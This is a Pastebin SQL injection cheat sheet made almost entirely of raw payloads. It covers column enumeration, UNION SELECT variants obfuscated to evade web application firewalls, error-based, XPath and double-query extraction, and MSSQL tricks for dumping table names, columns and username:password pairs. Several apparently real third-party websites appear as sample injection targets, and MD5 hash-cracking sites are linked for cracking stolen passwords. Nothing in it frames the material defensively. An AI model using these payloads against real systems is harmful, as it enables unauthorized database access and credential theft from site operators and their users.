Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #SQL injection
- By Pro Huss_x ++
- ################################################################
- ("/'/*/-)
- ----------------------------------------------------------------
- +having+1=1
- ################################################################
- +/*order*/+/*by*/+1-- -
- ----------------------------------------------------------------
- +order+by+100
- ----------------------------------------------------------------
- +Order+by+100+--+
- ----------------------------------------------------------------
- +Order+by+100-- -
- ----------------------------------------------------------------
- +Order+by+100-- _
- ----------------------------------------------------------------
- +Order+by+100--#
- ----------------------------------------------------------------
- +group+by+100-- -
- ----------------------------------------------------------------
- +order+by+100/*
- ----------------------------------------------------------------
- +order+by+100--
- ################################################################
- ( - ) [.php?id=-3 ]
- ----------------------------------------------------------------
- +union+select+
- ----------------------------------------------------------------
- +/**/uNIOn/**/+/**/sEleCt/**/+
- ----------------------------------------------------------------
- /*!50000UNION*/+/*!50000ALL*/+/*!50000SELECT*/
- ----------------------------------------------------------------
- +/*!12345union*/+/*!12345select*/+
- ----------------------------------------------------------------
- +union+distinct+select+
- ----------------------------------------------------------------
- +union+distinctROW+select+
- ----------------------------------------------------------------
- +%2F**/+Union/*!select*/
- ----------------------------------------------------------------
- /**//*!12345UNION SELECT*//**/
- ----------------------------------------------------------------
- /**//*!50000UNION SELECT*//**/
- ----------------------------------------------------------------
- +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
- ----------------------------------------------------------------
- +/*!u%6eion*/+/*!se%6cect*/+
- ----------------------------------------------------------------
- /**/uniUNIONon/**/selSELECTect/**/
- ----------------------------------------------------------------
- /*!50000%55nIoN*/+/*!50000%53eLeCt*/
- ----------------------------------------------------------------
- union /*!50000%53elect*/
- ----------------------------------------------------------------
- %55nion %53elect
- ----------------------------------------------------------------
- %75%6E%69%6F%6E+%73%65%6C%65%63%74
- ----------------------------------------------------------------
- %55nion(%53elect 1,2,3)-- -
- ----------------------------------------------------------------
- %a0union%a0select%09
- ----------------------------------------------------------------
- union/*&sort=*/select
- ----------------------------------------------------------------
- %0A%09UNION%0CSELECT%A0
- ----------------------------------------------------------------
- +%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+
- ----------------------------------------------------------------
- +UnIOn%0d%0aSeleCt%0d%0a1,2,3
- ----------------------------------------------------------------
- +union%23foo*%2F*bar%0D%0Aselect% 23foo%0D%0A1%2C2%2C1,2,3
- ----------------------------------------------------------------
- /*!fuckU%0d%0aunion*/+/*!fuckU%0d% 0aSelEct*/
- ----------------------------------------------------------------
- /**//*!union*//**//*!select*//**/
- ----------------------------------------------------------------
- union++++all++++select/
- ----------------------------------------------------------------
- php?id=1 /**/UniON/**//*50000seLect*/ 1,2,3,4,5--
- ----------------------------------------------------------------
- /*!union*//*--*//*!all*//*--*//*!select*/ 1,2,3,4,5,6
- ----------------------------------------------------------------
- /*!union*//*--*//*!all*//*--*//*!select*/ 1,2,3,4,5,6
- ----------------------------------------------------------------
- +Having+1=2+union+All+select+
- ----------------------------------------------------------------
- +union+distinct+select+
- ----------------------------------------------------------------
- +union+distinctROW+select
- ----------------------------------------------------------------
- index.php?id=(1)+union+(select+(0),(0),(0),@@versi on,(0))--+
- ################################################################
- version() | in linux
- ----------------------------------------------------------------
- @@version | in windwes
- ----------------------------------------------------------------
- database()
- ----------------------------------------------------------------
- user()
- ----------------------------------------------------------------
- @@datadir
- ----------------------------------------------------------------
- system_user()
- ----------------------------------------------------------------
- concat(user(),0x3a,version(),0x3a,database())
- ################################################################
- group_concat(table_name)
- ----------------------------------------------------------------
- gROuP_CoNcaT(TAblE_nAMe)
- ----------------------------------------------------------------
- +from information_schema.tables+where+table_schema=database()--
- ################################################################
- group_concat(column_name)
- ----------------------------------------------------------------
- +from information_schema.columns where table_name=0x
- ----------------------------------------------------------------
- http://www.waraxe.us/sql-char-encoder.html
- ----------------------------------------------------------------
- [id,pass,user,email]
- ################################################################
- group_concat(user,0x3a,pass)
- ----------------------------------------------------------------
- +from+users
- ################################################################
- Hash Md5
- https://hashkiller.co.uk/md5-decrypter.aspx
- ----------------------------------------------------------------
- http://www.hashchecker.de/find.html
- ################################################################
- #password
- concat(table_name,0x3e,column_name,0x3e,table_schema)
- ----------------------------------------------------------------
- +from+information_schema.columns+where+column_name+like+char(37, 112, 97, 115, 115, 37)--
- #username
- group_concat(table_Name,0x3a,column_Name)
- ----------------------------------------------------------------
- from+information_schema.columns+where+table+name=0x
- ################################################################
- +order+by+number
- ----------------------------------------------------------------
- +union+select+1,2,3,4,5,6....
- ----------------------------------------------------------------
- concat(column_name,0x3e,table_schema,0x3e,table_name)
- ----------------------------------------------------------------
- +from+information_schema.columns+where+column_name+like+char(37, 112, 97, 115, 115, 37)--
- ################################################################
- #Not Acceptable!+forbidden
- +/*!50000UNiON+/*!50000SeLeCt*/+
- ----------------------------------------------------------------
- +/*!50000Union*/+SeLEct+
- ----------------------------------------------------------------
- +Union+/*!50000SeLEct*/+
- -----------------------------------------------------------------
- /*!50000GrOuP_CoNcAT(table_name)*/
- -----------------------------------------------------------------
- group_concat(/*!50000table_name*/)
- -----------------------------------------------------------------
- +from+/*!50000information_schema*/./*!50000tables*/+where+/*!50000table_schema*/=database()-- -
- -----------------------------------------------------------------
- /*!50000GrOuP_CoNcAT(column_name)*/
- -----------------------------------------------------------------
- GrOuP_CoNcAT(/*!50000column_name*/)
- -----------------------------------------------------------------
- +from+/*!50000information_schema*/./*!50000columns*/+where+/*!50000table_schema*/=database()-- -
- ----------------------------------------------------------------
- +from+/*!50000information_schema*/./*!50000columns*/+where+/*!50000table_name*/=-- -
- ----------------------------------------------------------------
- /*!50000GrOuP_CoNcAT(password,0x3a,username)*/
- ----------------------------------------------------------------
- +from+admin-- -
- ----------------------------------------------------------------
- export_set(5,@:=0,(select+count()/!50000from*/+/!50000information_schema/.columns where table_schema=database() and @:=export_set(5,export_set%285,@,0x3c6c693e,/!50000column_name/,2),0x3a3a,/!50000table_name/,2)),@,2)
- ################################################################
- #unhex(hex(بيانات الاستعلام)))
- ----------------------------------------------------------------
- unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3 e,table_Name)))
- ----------------------------------------------------------------
- /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
- ----------------------------------------------------------------
- grOUp_ConCat(/*!TaBlE_NamE*/)
- ----------------------------------------------------------------
- +FrOm+InfoRmaTion_ScHEma./*!TaBleS*/
- ----------------------------------------------------------------
- grOUp_ConCat(/*!TaBlE_NamE*/,0x3e,/*!CoLuMn_NamE*/)
- ----------------------------------------------------------------
- +FrOm+InfoRmaTion_ScHEma./*!CoLuMnS*/+WheRe+/*!TaBlE_NamE*/+like+CHAR(97, 100, 109, 105, 110)
- ----------------------------------------------------------------
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- ----------------------------------------------------------------
- +FrOm+
- ---------------#####-------------------------------------------
- +from+information_schema . tables
- ----------------------------------------------------------------
- /*!12345UNION*/ /*!12345SELECT*/ /*!ALL*/
- ----------------------------------------------------------------
- /*!GrOuP_CoNcAT(table_name)*/
- ----------------------------------------------------------------
- +FROM /*!INFORMATION_SCHEMA*/./*!TABLES*/ WHERE TABLE_SCHEMA=DATABASE()-- -
- ################################################################
- /*!50000 */
- /*!40000 */
- /*!30000 */
- /*!12345 */
- /*!41320 */
- /*!32302 */
- /*!00000 */
- /*! */
- /**/
- +/**/+
- /*! GROUP_CONCAT(,0x3a,)*/
- /*!concat_ws(0x3a,)*/
- +union+distinct+select+
- +union+distinctROW+select+
- ################################################################
- #Not Acceptable!+forbidden 2
- ----------------------------------------------------------------
- +/*!00000UNION*/+SELECT+
- ----------------------------------------------------------------
- /*!00000group_concat(table_name)*/
- ----------------------------------------------------------------
- +/*!00000from+information_schema.tables*/+where+table_schema=database()-- -
- ----------------------------------------------------------------
- /*!00000group_concat(column_name)*/
- ----------------------------------------------------------------
- +/*!00000from+information_schema.columns*/+where+table_name=-- -
- ----------------------------------------------------------------
- +/*!00000group_concat(table_Name,0x3a,column_Name)*/
- ----------------------------------------------------------------
- +from+admin-- -
- ################################################################
- =1 and 1=1
- ----------------------------------------------------------------
- =1 and 1=2
- +AND MID(VERSION(),1,1) = '3';
- ----------------------------------------------------------------
- +AND MID(VERSION(),1,1) = '4';
- ----------------------------------------------------------------
- +AND MID(VERSION(),1,1) = '5';
- ----------------------------------------------------------------
- =-[.]1 union select 1,2,3,4,5,6,7,8,9,10,version() -- -
- ----------------------------------------------------------------
- version = 5.1.73-0ubuntu0.10.04.1
- ################################################################
- #Forbidden Hing
- ----------------------------------------------------------------
- current_user/**_**/()
- ----------------------------------------------------------------
- database/**_**/()
- ----------------------------------------------------------------
- div @s:=(concat(@c:=0x00,if((select count(*)/*!50000from*//*!50000information_schema*/.columns where table_schema=database/**X**/() and @c:=concat(@c, 0x3c62723e, /*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c))/*!50000union*/ select
- ----------------------------------------------------------------
- concat(0x3c62723e, version(), 0x203a3a20416c69204b68616e,0x3c62723e64617461626173653a20,DataBasE/**X**/(),0x3c62723e757365723a20,UsEr/**X**/(), @s)
- ----------------------------------------------------------------
- div @s:=((SELECT+GROUP_CONCAT(password,0x3a,username+SEPARATOR+0x3c62723e)+FROM+user)) /*!50000union*/ select
- ----------------------------------------------------------------
- (@s)
- ----------------------------------------------------------------
- %66rom
- ----------------------------------------------------------------
- export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns where table_schema=database() and @:=export_set(5,export_set%285,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
- ################################################################
- #Boolean
- +in+boolean+mode)+UNION+SELECT+
- ################################################################
- #Error Based
- ----------------------------------------------------------------
- or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1
- ----------------------------------------------------------------
- and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- ----------------------------------------------------------------
- and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- ----------------------------------------------------------------
- and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x726174696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- ----------------------------------------------------------------
- and (select 1 from (select count(*),concat((select(select concat(cast(concat(mm_pwd,0x7e,mm_role) as char),0x7e)) from lpsschoo.members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- ----------------------------------------------------------------#Data
- and+extractvalue(rand(),concat(0x7e,(select+concat(mm_pwd,0x7e,mm_role)+from+members+limit+0,1)))
- ----------------------------------------------------------------
- +or+1+group+by+concat_ws(0x7e,(select+concat(uname,0x7e,pass)+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1-- -
- ################################################################
- #Fatal Error Occurred
- null or version()
- http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,6--
- http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,2,3,4,5,6-- -
- http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,null,3,4,5,6-- -
- http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,null,4,5,6-- -
- http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,null,5,6-- -
- http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6-- -
- http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,null-- -
- or all null or version()
- http://wwfa.org.uk/article.php?id=-174 UNION SELECT version(),version(),version(),version(),version(),version()--
- http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,null,null,null,null,null-- -
- or
- http://wwfa.org.uk/article.php?id=.174+and+1=2
- http://wwfa.org.uk/article.php?id=.174+and+1=2+union+select "1' UNION SELECT+1,2,3-- -",2,3-- -
- ################################################################
- #illegal mix of coolation
- ----------------------------------------------------------------
- Illegal mix of collations for operation 'UNION'
- ----------------------------------------------------------------
- http://smtmax.com/category.php?id=15
- ----------------------------------------------------------------
- smtmax.com/category.php?id=.15 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- -
- ----------------------------------------------------------------
- group_concat(table_name)
- ----------------------------------------------------------------
- +From+InfORmaTion_schema.+tAblES+Where+table_ScHEmA=schEMA()-- -
- ------------------########-------------------------------------
- convert(group_concat(table_name) using ascii)
- ----------------------------------------------------------------
- unhex(hex(group_concat(table_name)))
- ----------------------------------------------------------------
- convert(value using xxxx)
- ----------------------------------------------------------------
- unhex(hex(value))
- ----------------------------------------------------------------
- cast(value as char)
- ----------------------------------------------------------------
- uncompress(compress(version()))
- ----------------------------------------------------------------
- cast(value as char)
- ----------------------------------------------------------------
- aes_decrypt(aes_encrypt(value,1),1)
- ----------------------------------------------------------------
- binary(value)
- ----------------------------------------------------------------
- ascii
- ujis
- ucs2
- tis620
- swe7
- sjis
- macroman
- macce
- latin7
- latin5
- latin2
- koi8u
- koi8r
- keybcs2
- hp8
- geostd8
- gbk
- gb2132
- armscii8
- ascii
- cp1250
- big5
- cp1251
- cp1256
- cp1257
- cp850
- cp852
- cp866
- cp932
- dec8
- euckr
- latin1
- utf8
- ################################################################
- #nember table :
- id=vv()
- id=@10
- id==10
- =10=10
- id=.10
- id=-10
- &id=polygon(10)
- id=null
- id=9999
- id=999999.9
- id=(-10)
- id=10+and+false+
- id=10 and 0
- id=10 dev 0
- ----------------------------------------------------------------
- +And+1=2
- and (1)!=(0)
- +and(1)=(0)
- +and+2>3+
- /*!aND*/ 1 like 0
- +where+1=2
- /*!and*/+1=0
- /*!and*/+1=0
- ---------------------------------------------------------------------------------------------------------------
- 2-search for vulnerable column (like 11111) in source code.
- +/*!12345union*/+select+1111,2222,3333,4444--+
- ---------------------------------------------------------------------------------------------------------------
- 3-put null to all columns and then starting with column ,replace single null to some number (one in a time).
- +/*!12345union*/+select+null,null,null,null--+
- ---------------------------------------------------------------------------------------------------------------
- 4-add version() in all columns.
- +/*!12345union*/+select+version(),version(),version(),version()--+
- ---------------------------------------------------------------------------------------------------------------
- 5-Brute Forcing COlumns In SQLi By Check Every Column.
- +/*!12345union*/+select+1111--+
- +/*!12345union*/+select+1111,2222--+
- +/*!12345union*/+select+1111,2222,3333--+
- +/*!12345union*/+select+1111,2222,3333,4444--+
- ---------------------------------------------------------------------------------------------------------------
- 6-check for routed query.
- ' and 0 Union SeLEct 1,"2' and 0 Union SeLEct 1,2,3,version(),5,6,7,8,9-- -",3,4,5,6,7,8,9-- -
- ---------------------------------------------------------------------------------------------------------------
- 7-check for injection inside injection.
- '*2e9unioN Select!1,2,3,4,5,0x6c656c276f72646572206279203123%23
- ---------------------------------------------------------------------------------------------------------------
- 8-check commenting out remaining query at the end for your injection.
- | --+ | --+- | +--+ | -- - | ` | ;-- - | " | %23 | %60 | ;%00 |%2523 | %2560 | ;%2500 | 0%0a) | // | /**/ | /* | # | / | ) | )' |
- ################################################################
- #Xpath UpdateXML 1
- ## version ##
- +and+extractvalue(rand(),concat(0x7e,version()))-- -
- ## Tables :
- +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- -
- ## column :
- +and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1)))-- -
- http://www.waraxe.us/sql-char-encoder.html
- ## Data :
- +and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+table+limit+0,1)))-- -
- ################################################################
- #Xpath UpdateXML 2
- ## Version ##
- +and+updatexml(0x7e,concat(0x7e,(version())),0)--
- +and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/ version()),0x7e),1)
- ## Getting The Tables (UpdateXML)
- +and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1))),0)--
- ## Getting Columns (UpdateXML)
- +and+updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_schema.columns+where+table_name=0xTABLE_HEX+limit+0,1))),0)--
- ## Getting Data (UpdateXML)
- +and+updatexml(0x7e,concat(0x7e,((select+concat(column1,0x7e,column2)+from+TABLENAME+limit+0,1))),0)--
- ################################################################
- #move injection
- concat('</title><script>alert("',SQLI,'")</script>')
- ################################################################
- #xtype=char85
- # DB #
- +or 1=convert(int,(DB_NAME()))--
- # table_name #
- +or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--
- and name!='TABLE-NAME-1'
- # column_name #
- +or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--
- and column_name!='COLUMN-NAME-1'
- # data #
- +or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))--
- +or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--
- ################################################################
- #DOUBLE Query Injection's
- #version
- +and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- ## Getting The DataBase ##
- +and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- ## Getting The Tables ##
- +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=hex-database limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- ## Getting The Columns ##
- +and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns+Where+table_schema=hex-database AND table_name=hex-table LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- ## Dump Data ##
- +and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e,cast(table_name.column_name as char)) FROM `database_name`.table_name LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- ################################################################
- #The connection was reset
- http://www.avt.sd/mpage.php?id=2-.1union select 1,2,3,4,5,6,7,8,9,10
- ?id=2-
- ?id=2-.1
- ?id=2-.1union select
- ################################################################
- #union based in windoes
- # EXTRACT DATABASE USER #
- USER - DB_NAME - @@VERSION - @@SERVERNAME - db_name()
- ---------------------------------------------------------------------------------------------------------------
- http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,db_name(),3--
- ---------------------------------------------------------------------------------------------------------------
- #db_table
- schema_name
- +from information Schema.schemata-- -
- id=-174 UNION SELECT 1,schema_name,3+from information Schema.schemata-- -
- ---------------------------------------------------------------------------------------------------------------
- # table_name #
- table_name
- from information Schema.table_shema!=db_name-- -
- id=-174 UNION SELECT 1,table_name,3+from information Schema.table_shema!=db_name-- -
- ---------------------------------------------------------------------------------------------------------------
- # column_name #
- column_name
- +from DBNAME.information_schema.columns where table_name='o_admin'--
- id=-174 UNION SELECT 1,column_name,3+from DBNAME.information_schema.columns where table_name='o_admin'--
- ---------------------------------------------------------------------------------------------------------------
- #Data
- id=-174 UNION SELECT 1,password,3+from+o_admin--
- ################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement